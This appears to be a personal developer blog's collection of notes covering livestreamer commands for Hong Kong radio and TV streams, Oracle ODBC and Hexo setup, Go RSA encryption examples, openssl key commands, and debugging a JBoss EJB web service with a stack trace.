livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://rthkaudio2-lh.akamaihd.net/i/radio2_1@355865/master.m3u8 best -p C:\Users\User\Downloads\mpv-x86_64-20170102-git-8e41f31\mpv.exe

Play 香港卫视

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://live.hkstv.hk.lxdns.com/live/hks/playlist.m3u8 best -p "C:\Program Files\VideoLAN\VLC\vlc.exe"

Play Faded from Alan Walker

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 https://www.youtube.com/watch?v=60ItHLz5WEA best -p "C:\Program Files\VideoLAN\VLC\vlc.exe"

Play RTMP stream (Need rtmpdump.exe in the current folder)

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 rtmp://live.hkstv.hk.lxdns.com/live/hks best -p "C:\Program Files\VideoLAN\VLC\vlc.exe"

Play by external player

  1. livestreamer --https-proxy=http://10.13.135.115:8080 --http-proxy=http://10.13.135.115:8080 hlsvariant://http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20161214.mp3/playlist.m3u8 best --player-external-http --player-external-http-port=12345 --verbose-player --stream-types=hls

  2. livestreamer --https-proxy=http://10.13.135.115:8080 --http-proxy=http://10.13.135.115:8080 hlsvariant://http://live.hkstv.hk.lxdns.com/live/hks/playlist.m3u8 best --player-external-http --player-external-http-port=12345 --verbose-player --stream-types=hls

Some player: gstreamer, ffplay, vlc, wmplayer, mpc-hc, mpv, potplayer

Install Oracle ODBC Driver for Crystal Report

Install Oracle ODBC Driver in Windows 7(64-bit)

Try to install OracleXE 32-bit and 64-bit version to install the odbc driver for starting Crystal Report but fail.

And fail to install ODAC to fix 32bit odbc driver for Crystal Report

Fix

  • Download instantclient-odbc-nt-11.2.0.2.0 and instantclient-basic-nt-11.2.0.2.0, extract them to the same folder, run
    odbc_install.exe
  • Add the TNS_ADMIN environment variable indicating the path of tnsnames.ora file such as c:\oracle\11.2.0\CLIENT\network\admin
  • Run c:\windows\SysWOW64\odbcad32.exe to configure DSN by choosing a driver which like instant_client_11, rather than calling %windir%\system32\odbcad32.exe to install the driver.

Reference

https://itkbs.wordpress.com/2014/07/28/how-to-install-odbc-driver-for-oracle-in-windows-7/

hexo config and light theme config

For migration in different machine, drop down the config as below

Requirements

1
2
3
4
Node.js & Git
npm install -g hexo-cli
npm install hexo --save
npm install hexo-deployer-git --save

Create blog folder

1
2
3
4
5
6
7
8
9
hexo init

git clone my-blog.git from bitbucket into source\_posts

git clone --depth 1 https://github.com/hexojs/hexo-theme-light themes/light

hexo g # generate page
hexo s # serve page
hexo d # deploy to github page

_config.yml of hexo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# Hexo Configuration
## Docs: https://hexo.io/docs/configuration.html
## Source: https://github.com/hexojs/hexo/

# Site
title: My Blog
subtitle:
description: My Blog
author: Forrest Wan
language: en
timezone: ''

# URL
## If your site is put in a subdirectory, set url as 'http://yoursite.com/child' and root as '/child/'
url: https://l1z2g9.github.io
root: /
permalink: :year/:month/:day/:title/
permalink_defaults:
pretty_urls:
trailing_index: true # Set to false to remove trailing 'index.html' from permalinks
trailing_html: true # Set to false to remove trailing '.html' from permalinks

# Directory
source_dir: source
public_dir: public
tag_dir: tags
archive_dir: archives
category_dir: categories
code_dir: downloads/code
i18n_dir: :lang
skip_render:

# Writing
new_post_name: :title.md # File name of new posts
default_layout: post
titlecase: false # Transform title into titlecase
external_link:
enable: true # Open external links in new tab
field: site # Apply to the whole site
exclude: ''
filename_case: 0
render_drafts: false
post_asset_folder: false
relative_link: false
future: true
highlight:
enable: true
line_number: true
auto_detect: true
tab_replace: ''
wrap: true
hljs: false
prismjs:
enable: false
preprocess: true
line_number: true
tab_replace: ''

# Home page setting
# path: Root path for your blogs index page. (default = '')
# per_page: Posts displayed per page. (0 = disable pagination)
# order_by: Posts order. (Order by date descending by default)
index_generator:
path: '/'
per_page: 0
order_by: -date

# Category & Tag
default_category: uncategorized
category_map:
tag_map:

# Metadata elements
## https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
meta_generator: true

# Date / Time format
## Hexo uses Moment.js to parse and display date
## You can customize the date format as defined in
## http://momentjs.com/docs/#/displaying/format/
date_format: YYYY-MM-DD
time_format: HH:mm:ss
## updated_option supports 'mtime', 'date', 'empty'
updated_option: 'mtime'

# Pagination
## Set per_page to 0 to disable pagination
per_page: 0
pagination_dir: page

# Include / Exclude file(s)
## include:/exclude: options only apply to the 'source/' folder
include:
exclude:
ignore:

# Extensions
## Plugins: https://hexo.io/plugins/
## Themes: https://hexo.io/themes/
theme: light

# Deployment
## Docs: https://hexo.io/docs/one-command-deployment
deploy:
type: git
repo: https://github.com/l1z2g9/l1z2g9.github.io

_config.yml under folder themes\light_config.yml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
menu:
Home:
Archives: archives

widgets:
- search
- category
- tag

excerpt_link: Read More

twitter:
username:
show_replies: false
tweet_count: 5

addthis:
enable: false
pubid:
facebook: true
twitter: true
google: true
pinterest: true

fancybox: false

google_analytics:
rss:

comment_provider: facebook
# Facebook comment
facebook:
appid: 123456789012345
comment_count: 5
comment_width: 840
comment_colorscheme: light

RSA Encrypt Decrypt with Golang

https://github.com/jasondavies/jsbn && http://www-cs-students.stanford.edu/~tjw/jsbn/rsa.html
http://stackoverflow.com/questions/36450743/go-how-to-set-rsa-publickey-modulus-from-string

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
package main

import (
"crypto"
"crypto/rand"
"crypto/rsa"
"crypto/sha1"
"fmt"
"io"
"os"
)

func main() {

// generate private key
privatekey, err := rsa.GenerateKey(rand.Reader, 1024)

if err != nil {
fmt.Println(err.Error)
os.Exit(1)
}

D := privatekey.D //private exponent
Primes := privatekey.Primes
PCValues := privatekey.Precomputed

// Note : Only used for 3rd and subsequent primes
//CRTVal := privatekey.Precomputed.CRTValues

fmt.Println("Private Key : ", privatekey)
fmt.Println()
fmt.Println("Private Exponent : ", D.String())
fmt.Println()
fmt.Printf("Primes : %s %s \n", Primes[0].String(), Primes[1].String())
fmt.Println()
fmt.Printf("Precomputed Values : Dp[%s] Dq[%s]\n", PCValues.Dp.String(), PCValues.Dq.String())
fmt.Println()
fmt.Printf("Precomputed Values : Qinv[%s]", PCValues.Qinv.String())
fmt.Println()

// Note : Only used for 3rd and subsequent primes
//fmt.Printf("CRTValues : Exp[%s]\n Coeff[%s]\n R[%s]\n", CRTVal[2].Exp.String(), CRTVal[2].Coeff.String(), CRTVal[2].R.String())

// Note : if you want to have multi primes,
// use rsa.GenerateMultiPrimeKey() function instead of
// rsa.GenerateKey() function
// see http://golang.org/pkg/crypto/rsa/#GenerateMultiPrimeKey

// http://golang.org/pkg/crypto/rsa/#PrivateKey.Precompute
privatekey.Precompute()

// http://golang.org/pkg/crypto/rsa/#PrivateKey.Validate
err = privatekey.Validate()

if err != nil {
fmt.Println(err.Error)
os.Exit(1)
}

var publickey *rsa.PublicKey
publickey = &privatekey.PublicKey
N := publickey.N // modulus
E := publickey.E // public exponent

fmt.Println("Public key ", publickey)
fmt.Println()
fmt.Println("Public Exponent : ", E)
fmt.Println()
fmt.Println("Modulus : ", N.String())
fmt.Println()

// EncryptOAEP
msg := []byte("The secret message!")
label := []byte("")
sha1hash := sha1.New()

encryptedmsg, err := rsa.EncryptOAEP(sha1hash, rand.Reader, publickey, msg, label)

if err != nil {
fmt.Println(err)
os.Exit(1)
}

fmt.Printf("OAEP encrypted [%s] to \n[%x]\n", string(msg), encryptedmsg)
fmt.Println()

// DecryptOAEP
decryptedmsg, err := rsa.DecryptOAEP(sha1hash, rand.Reader, privatekey, encryptedmsg, label)

if err != nil {
fmt.Println(err)
os.Exit(1)
}

fmt.Printf("OAEP decrypted [%x] to \n[%s]\n", encryptedmsg, decryptedmsg)
fmt.Println()

// EncryptPKCS1v15
encryptedPKCS1v15, errPKCS1v15 := rsa.EncryptPKCS1v15(rand.Reader, publickey, msg)

if errPKCS1v15 != nil {
fmt.Println(errPKCS1v15)
os.Exit(1)
}

fmt.Printf("PKCS1v15 encrypted [%s] to \n[%x]\n", string(msg), encryptedPKCS1v15)
fmt.Println()

// DecryptPKCS1v15
decryptedPKCS1v15, err := rsa.DecryptPKCS1v15(rand.Reader, privatekey, encryptedPKCS1v15)

if err != nil {
fmt.Println(err)
os.Exit(1)
}

fmt.Printf("PKCS1v15 decrypted [%x] to \n[%s]\n", encryptedPKCS1v15, decryptedPKCS1v15)
fmt.Println()

// SignPKCS1v15
var h crypto.Hash
message := []byte("This is the message to be signed!")
hash := sha1.New()
io.WriteString(hash, string(message))
hashed := hash.Sum(nil)

signature, err := rsa.SignPKCS1v15(rand.Reader, privatekey, h, hashed)

if err != nil {
fmt.Println(err)
os.Exit(1)
}

fmt.Printf("PKCS1v15 Signature : %x\n", signature)

//VerifyPKCS1v15
err = rsa.VerifyPKCS1v15(publickey, h, hashed, signature)

if err != nil {
fmt.Println("VerifyPKCS1v15 failed")
os.Exit(1)
} else {
fmt.Println("VerifyPKCS1v15 successful")
}
fmt.Println()

}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
package main

import (
"crypto/rand"
"crypto/rsa"
"crypto/x509"
"encoding/hex"
"encoding/pem"
"errors"
"fmt"
"io/ioutil"
"math/big"
"strconv"
)

/*
show by command prompt
openssl genrsa -out key.pem
openssl rsa -in key.pem -pubout > key-pub.pem


echo polaris@studygolang.com | openssl rsautl \
-encrypt \
-pubin -inkey key-pub.pem \
> cipher.txt

cat cipher.txt | openssl rsautl \
-decrypt \
-inkey key.pem


** OR encoding by base64 **
echo polaris@studygolang.com | openssl rsautl \
-encrypt -pubin -inkey key-pub.pem \
| openssl base64
openssl base64 -d | openssl rsautl -decrypt -inkey key.pem

*/

var privateKey = []byte(`
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwOJK1RJBUwRu/5aCyktTaietXFMOAAkElhSq1M6BocVWs7yD
y592CX30Bl0Ul4faWM9EZSlhak8Ay1CdMNis+lBZanKmAO2bPmSIIYBDQE2BzLIo
MoJWi/Cd5PevioKSRPytqVB/S4+xz1IOD8Y407SZM3LfZ5XMfqC+VHpcnAycQ8iT
FK0s3yjImathFNF3U7fiEzU4G7PJRn8e9ntubDd1pXYABqrVF/REcd/3Rs/qrlhG
v3b7tAXZb2lkSLdCq3Md+BMksxUCoH3rZijSphbZSCdIrzofg+IG0y5WtdsBz6uw
Ol2QX/EUoEdO+xhLgaOFykUoWz037ZzkLEhKkQIDAQABAoIBAB+1lAPPSnnxYqYW
Ak5rb70l5LQm20haMyzRHPx7Loh/vq8xsKELCAardDCPoNEAfn7XJDFVSjSF5GWI
TS84j8de6jQ7wNqqNTleoZqQUX4Cv/H83+rdzoiW9/4qUet9Z7p7p7kMCMFNUDf7
D2C8f58eM4lnux52W/X9SwzsSMlGaGHcAKPz4vXUFWyt3naVtANhdkHjgKxA0Ev4
W7yRgpbOKruPKzBNTRXAqq+yHZj/pONtXl8do+plwhHU8CW0BPyvkU4DH52lxWza
mM71ow8UJC30FXF/NZ+wthFnRZO3/dhaeuNYgX7yAs3DhNn7Q8nzU4ujd8ug2OGf
iJ9C8YECgYEA32KthV7VTQRq3VuXMoVrYjjGf4+z6BVNpTsJAa4kF+vtTXTLgb4i
jpUrq6zPWZkQ/nR7+CuEQRUKbky4SSHTnrQ4yIWZTCPDAveXbLwzvNA1xD4w4nOc
JgG/WYiDtAf05TwC8p/BslX20Ox8ZAXUq6pkAeb1t8M2s7uDpZNtBMkCgYEA3QuU
vrrqYuD9bQGl20qJI6svH875uDLYFcUEu/vA/7gDycVRChrmVe4wU5HFErLNFkHi
uifiHo75mgBzwYKyiLgO5ik8E5BJCgEyA9SfEgRHjozIpnHfGbTtpfh4MQf2hFsy
DJbeeRFzQs4EW2gS964FK53zsEtnr7bphtvfY4kCgYEAgf6wr95iDnG1pp94O2Q8
+2nCydTcgwBysObL9Phb9LfM3rhK/XOiNItGYJ8uAxv6MbmjsuXQDvepnEp1K8nN
lpuWN8rXTOG6yG1A53wWN5iK0WrHk+BnTA7URcwVqJzAvO3RYVPqqlcwTKByOtrR
yhxcGmdHMusdWDaVA7PpS1ECgYATCGs/XQLPjsXje+/XCPzz+Epvd7fi12XpwfQd
Z5j/q82PsxC+SQCqR38bwwJwELs9/mBSXRrIPNFbJEzTTbinswl9YfGNUbAoT2AK
GmWz/HBY4uBoDIgEQ6Lu1o0q05+zV9LgaKExVYJSL0EKydRQRUimr8wK0wNTivFi
rk322QKBgHD3aEN39rlUesTPX8OAbPD77PcKxoATwpPVrlH8YV7TxRQjs5yxLrxL
S21UkPRxuDS5CMXZ+7gA3HqEQTXanNKJuQlsCIWsvipLn03DK40nYj54OjEKYo/F
UgBgrck6Zhxbps5leuf9dhiBrFUPjC/gcfyHd/PYxoypHuQ3JUsJ
-----END RSA PRIVATE KEY-----
`)

var publicKey = []byte(`
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwOJK1RJBUwRu/5aCyktT
aietXFMOAAkElhSq1M6BocVWs7yDy592CX30Bl0Ul4faWM9EZSlhak8Ay1CdMNis
+lBZanKmAO2bPmSIIYBDQE2BzLIoMoJWi/Cd5PevioKSRPytqVB/S4+xz1IOD8Y4
07SZM3LfZ5XMfqC+VHpcnAycQ8iTFK0s3yjImathFNF3U7fiEzU4G7PJRn8e9ntu
bDd1pXYABqrVF/REcd/3Rs/qrlhGv3b7tAXZb2lkSLdCq3Md+BMksxUCoH3rZijS
phbZSCdIrzofg+IG0y5WtdsBz6uwOl2QX/EUoEdO+xhLgaOFykUoWz037ZzkLEhK
kQIDAQAB
-----END PUBLIC KEY-----
`)

func RsaEncryptByPreSetPubKey() string {
n, _ := new(big.Int).SetString("24349343452348953201209477858721354875245881458202672294652984377378513954748002477250933828219774703952578332297494223229725595176463711802920124930360492553186030821158773846902662847263120685557322462156596316871394035160273640449724455863863094140814233064652945361596472111169159061323006507670749392076044355771083774400487999226532334510138900864338047649454583762051951010712101235391104817996664455285600818344773697074965056427233256586264138950003914735074112527568699379597208762648078763602593269860453947862814755877433560650621539845829407336712267915875159364773551462882284084578152070138814976772753", 10)
e, _ := strconv.ParseInt("10001", 16, 0)

fmt.Printf("##RsaEncrypt2 n %x\n", n)
fmt.Printf("##RsaEncrypt2 e %x\n", e)
pubKey := rsa.PublicKey{n, int(e)}
data, _ := rsa.EncryptPKCS1v15(rand.Reader, &pubKey, []byte("it's great for rsa"))

return hex.EncodeToString(data)
}

func main() {
msg := "polaris@studygolang.com"
data, err := RsaEncrypt([]byte(msg))
fmt.Printf("PKCS1v15 encrypted [%s] to \n[%x]\n", string(msg), data)

ioutil.WriteFile("encrypted.txt", data, 0644)

if err != nil {
panic(err)
}
origData, err := RsaDecrypt(data)
if err != nil {
panic(err)
}
fmt.Println("origData >> ", string(origData))

//cipherText, _ := hex.DecodeString("b6ee3caf14430003a20625ba1ea9ad31560ad203f7ecee46dd8e31f2dc47d278f3248bc0180e03571fdbf34a60aad7310468e6d6013fcfd6b785d1562411b44e089281adcc275a2037db3dec8b447b91162c859ab97372081c1bcb22a1fb33b1f72a06a54b1784d9f733aa1e869c6d64d45a7a78534714a773920ef7219b31f89092fc54f87ff371aeae5c3e59cdaad3fa05c24e781e06fcd46b35127a431bd85f62bafded95e3d31127159a0b5d13b77f11ecef94a037ac1d2f2c32fc0e6623cfe056127457f8f82631c33139a50fcd16c17e577b12f853cd55ffb16e099097dd76a21d987c536ac102b470e36881fc86f1667b505120a531458a116ca285b7")
cipherText, _ := hex.DecodeString(RsaEncryptByPreSetPubKey())

origData2, err := RsaDecrypt(cipherText)
if err != nil {
panic(err)
}
fmt.Println("origData2 >> ", string(origData2))

}

// 加密
func RsaEncrypt(origData []byte) ([]byte, error) {
block, _ := pem.Decode(publicKey)
if block == nil {
return nil, errors.New("public key error")
}
pubInterface, err := x509.ParsePKIXPublicKey(block.Bytes)
if err != nil {
return nil, err
}
pub := pubInterface.(*rsa.PublicKey)

fmt.Println("Modulus : ", pub.N.String())

fmt.Println(">>> ", pub.N)
fmt.Printf("Modulus(Hex) : %X\n", pub.N)
fmt.Println("Public Exponent : ", pub.E)

return rsa.EncryptPKCS1v15(rand.Reader, pub, origData)
}

// 解密
func RsaDecrypt(ciphertext []byte) ([]byte, error) {
block, _ := pem.Decode(privateKey)
if block == nil {
return nil, errors.New("private key error!")
}
priv, err := x509.ParsePKCS1PrivateKey(block.Bytes)
if err != nil {
return nil, err
}
return rsa.DecryptPKCS1v15(rand.Reader, priv, ciphertext)
}

Repair file system openssl keygen

On folder /opt, just want to change the directory mode to 666, but run sudo chmod -R 666 .., then all commands like ‘ls’, ‘which’, ‘pwd’ do not work.

  • Fix
    Login as root, run chmod 755 / chmod 755 /bin chmod 755 /usr

  • Openssl and Keygen
    `
    ssh public key stored in .ssh folder:
    ssh-keygen -f koding -y > koding_id_rsa.pub

output public key from the private key
openssl rsa -in koding -pubout > koding-pub.pem

p12 file (usually with .pfx extension) contains certificate, public key, private key
openssl x509 - for certificate
openssl x509 -inform der -in certificate.cer -out certificate.pem (with -pubkey -noout to print public key only)

openssl pkcs12 - for p12 file
openssl pkcs12 -in certificate.pfx -out certificate.cer -nodes

openssl rsa - for private key
openssl rsa -in koding -out koding2 (Remove a passphrase from a private key)

openssl req - for private key and csr related
openssl req -out CSR.csr -key privateKey.key -new
`

Axis2-xmlbeans-EJB3-Extension-B-Character

Class MyEJB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
package my.test;

import java.util.ArrayList;
import java.util.Calendar;
import java.util.List;

import xx.webservices.type.ESubmissionBatchType;
import xx.webservices.type.ESubmissionListType;
import xx.webservices.type.YYSubmissionRequestDocument;
import xx.webservices.type.YYSubmissionResponseDocument;

import javax.annotation.security.PermitAll;
import javax.ejb.EJBException;
import javax.ejb.Stateless;
import javax.ejb.TransactionManagement;
import javax.ejb.TransactionManagementType;

@Stateless(name = "MyEJB")
@TransactionManagement(TransactionManagementType.BEAN)
@PermitAll
public class MyEJB implements IMyEJB, IMyEJBLocal {
public YYSubmissionResponseDocument getYYSubmission(YYSubmissionRequestDocument YYSubmissionRequest)
throws EJBException {
YYSubmissionResponseDocument outDoc = YYSubmissionResponseDocument.Factory.newInstance();
ESubmissionBatchType esubBatchType = outDoc.addNewYYSubmissionResponse().addNewOut();
Calendar fromDate = Calendar.getInstance();
Calendar toDate = Calendar.getInstance();

esubBatchType.setFromDateTime(fromDate);
esubBatchType.setToDateTime(toDate);

List<String> returnList = new ArrayList<String>();
String a = "\uD840\udcd9";
String b = "\uD840\udc59";
returnList.add(a);
returnList.add(b);

ESubmissionListType eSubmitListType = esubBatchType.addNewESubmissionList();
for (int i = 0; i < returnList.size(); i++) {
eSubmitListType.addESubmission(returnList.get(i));
}

esubBatchType.setNoOfSubmission(new Integer(eSubmitListType.sizeOfESubmissionArray()).toString());

return outDoc;

}
}

Interface IMyEJB

1
2
3
4
5
6
7
8
9
10
11
12
13
package my.test;

import xx.webservices.type.YYSubmissionRequestDocument;
import xx.webservices.type.YYSubmissionResponseDocument;

import javax.ejb.EJBException;
import javax.ejb.Remote;

@Remote
public interface IMyEJB {
public YYSubmissionResponseDocument getYYSubmission(YYSubmissionRequestDocument YYSubmissionRequest)
throws EJBException;
}

Interface IMyEJBLocal

1
2
3
4
5
6
7
8
9
10
11
12
13
package my.test;

import xx.webservices.type.YYSubmissionRequestDocument;
import xx.webservices.type.YYSubmissionResponseDocument;

import javax.ejb.EJBException;
import javax.ejb.Local;

@Local
public interface IMyEJBLocal {
public YYSubmissionResponseDocument getYYSubmission(YYSubmissionRequestDocument YYSubmissionRequest)
throws EJBException;
}

Class ABCSkeleton

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
package my.test;

public class ABCSkeleton {

public xx.webservices.type.YYSubmissionResponseDocument getYYSubmission(
xx.webservices.type.YYSubmissionRequestDocument YYSubmissionRequest) {

xx.webservices.type.YYSubmissionResponseDocument outDoc = null;
try {
outDoc = getMyEJB().getYYSubmission(YYSubmissionRequest);
return outDoc;
} catch (Exception e) {
log.error("Exception in getYYSubmission", e);
throw new java.lang.UnsupportedOperationException(e);
}
}

private IMyEJB getMyEJB() throws Exception {
InitialContext initialContext = new InitialContext();
IMyEJB myEJB = (IMyEJB) initialContext.lookup("java:app/my_app/MyEJB!my.test.IMyEJB");
return myEJB;
}
}

application.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?xml version="1.0" encoding="UTF-8"?>
<application
xmlns="http://java.sun.com/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/application_6.xsd"
version="6">

<application-name>ww_ds</application-name>
<initialize-in-order>true</initialize-in-order>

<module>
<web>
<web-uri>axis2.war</web-uri>
<context-root>yy_ws</context-root>
</web>
</module>
<module>
<ejb>my_app.jar</ejb>
</module>
<library-directory>lib</library-directory>
</application>

Deploy this ear to JBoss EAP 6.4

copy the yy.ear to folder sftp://support@10.13.135.37//opt/software/jboss-eap-6.4/standalone/deployments/

Call webservice via http

curl http://10.13.135.37:9080/yy_ws/services/esubmission/getYYSubmission
Throw error as

1
2
3
4
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<faultstring>
java.lang.RuntimeException: JBAS014154: Failed to marshal EJB parameters
</faultstring>

Trace log in /tmp/axis2.log

In yy.ear/axis2.war/WEB-INF/classes/log4j.properties, set option log4j.rootCategory=INFO, CONSOLE, LOGFILE and log4j.appender.LOGFILE.File=/tmp/axis2.log
Found error as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.values.XmlObjectBase$SerializedRootObject.readObject(XmlObjectBase.java:2652)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at java.lang.reflect.Method.invoke(Method.java:497)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.reflect.SerializableClass.callReadObject(SerializableClass.java:307)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.initSerializableClone(SerializingCloner.java:303)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:251)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:172)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:128)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.ejb3.remote.LocalEjbReceiver.clone(LocalEjbReceiver.java:295)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO stdout - ... 42 more
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - Caused by: org.apache.xmlbeans.XmlException: error: Illegal XML Character: 0xd840
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - org.apache.xmlbeans.impl.piccolo.io.IllegalCharException: Illegal XML Character: 0xd840
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.piccolo.xml.XMLReaderReader.read(XMLReaderReader.java:146)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.piccolo.xml.PiccoloLexer.yy_refill(PiccoloLexer.java:3474)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.piccolo.xml.PiccoloLexer.yylex(PiccoloLexer.java:3958)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.piccolo.xml.Piccolo.yylex(Piccolo.java:1290)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.piccolo.xml.Piccolo.yyparse(Piccolo.java:1400)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.piccolo.xml.Piccolo.parse(Piccolo.java:714)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.store.Locale$SaxLoader.load(Locale.java:3435)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.store.Locale.parse(Locale.java:706)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.store.Locale.parseToXmlObject(Locale.java:690)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.store.Locale.parseToXmlObject(Locale.java:677)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.schema.SchemaTypeLoaderBase.parse(SchemaTypeLoaderBase.java:208)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.xmlbeans.impl.values.XmlObjectBase$SerializedRootObject.readObject(XmlObjectBase.java:2648)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at java.lang.reflect.Method.invoke(Method.java:497)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.reflect.SerializableClass.callReadObject(SerializableClass.java:307)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.initSerializableClone(SerializingCloner.java:303)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:251)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:172)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:128)
